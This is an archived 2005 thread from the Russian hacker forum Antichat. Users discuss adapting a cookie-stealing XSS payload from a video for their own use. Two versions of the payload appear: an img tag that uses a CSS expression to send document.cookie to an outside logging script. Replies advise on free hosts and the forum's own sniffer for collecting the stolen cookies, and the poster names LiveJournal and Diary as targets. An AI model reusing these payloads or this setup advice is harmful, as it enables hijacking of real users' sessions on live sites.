Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Комментарии к видео (https://forum.antichat.xyz/forumdisplay.php?f=27)
-   -   Видео Zadoxlik'a по XSS (https://forum.antichat.xyz/showthread.php?t=8926)

*Van* 20.08.2005 15:53

Видео Zadoxlik'a по XSS
 
Просмотрел я видео по XSS и возникли у меня такие вопросы: как настроить сплойт, чтобы куки присылались на мой txt-документ на народе? Исходный текст сплойта с видео:
<*img src="http://zadoxlik.net.ru/lj.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://zadoxlik.net.ru/lj.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)

qBiN 20.08.2005 17:16

Учить js надо.
А нахера на народе?
На народе не получится...

*Van* 20.08.2005 17:36

Мне не обязательно на народе. Главное чтоб мне пришло.) На каком бесплатном хостинге получится?

Toys2004 20.08.2005 18:23

Да, если можно, то объясните асё по-подробней :)

Zadoxlik 20.08.2005 21:08

Цитата:

Сообщение от Ван
Просмотрел я видео по XSS и возникли у меня такие вопросы: как настроить сплойт, чтобы куки присылались на мой txt-документ на народе? Исходный текст сплойта с видео:
<*img src="http://zadoxlik.net.ru/lj.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://zadoxlik.net.ru/lj.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)

Никак. Куки пересылаются GET запросом к скрипту, где в QUERY_STRING (строка с параметрами запроса) располагается содержимое куков. Скрипт принимает их и записывает в файл. Т.к. на народе серверные скрипты размещать нельзя, то и сниффер там установить тоже нельзя.

madnet 20.08.2005 22:39

Цитата:

Сообщение от Ван
Мне не обязательно на народе. Главное чтоб мне пришло.) На каком бесплатном хостинге получится?

Можеш на Holm.ru сделать себе сниффер
Кроме этого можеш использовать сниффер античата и сделать подписку и все придет тебе на мыло.

*Van* 21.08.2005 00:48

Ну раз на народе нельзя, то первое время поюзаю античатовский сниффер. Вот так код верен?

<*img src="http://antichat.ru/sniff/log.php" style="top:expres/**/sion(eval(this.sas));"
sas="this.src='http://antichat.ru/sniff/log.php?'+document.cookie;this.sas=null" alt=''*>
(без звездочек)

Zadoxlik 21.08.2005 10:48

В ЖЖ сейчас это прикрыли

*Van* 21.08.2005 12:08

Ну а сплойт верный? Я ещё может на дайри попробую.

Algol 27.08.2005 00:51

Цитата:

Сообщение от Ван
Ну а сплойт верный?

Неверный.


Время: 06:53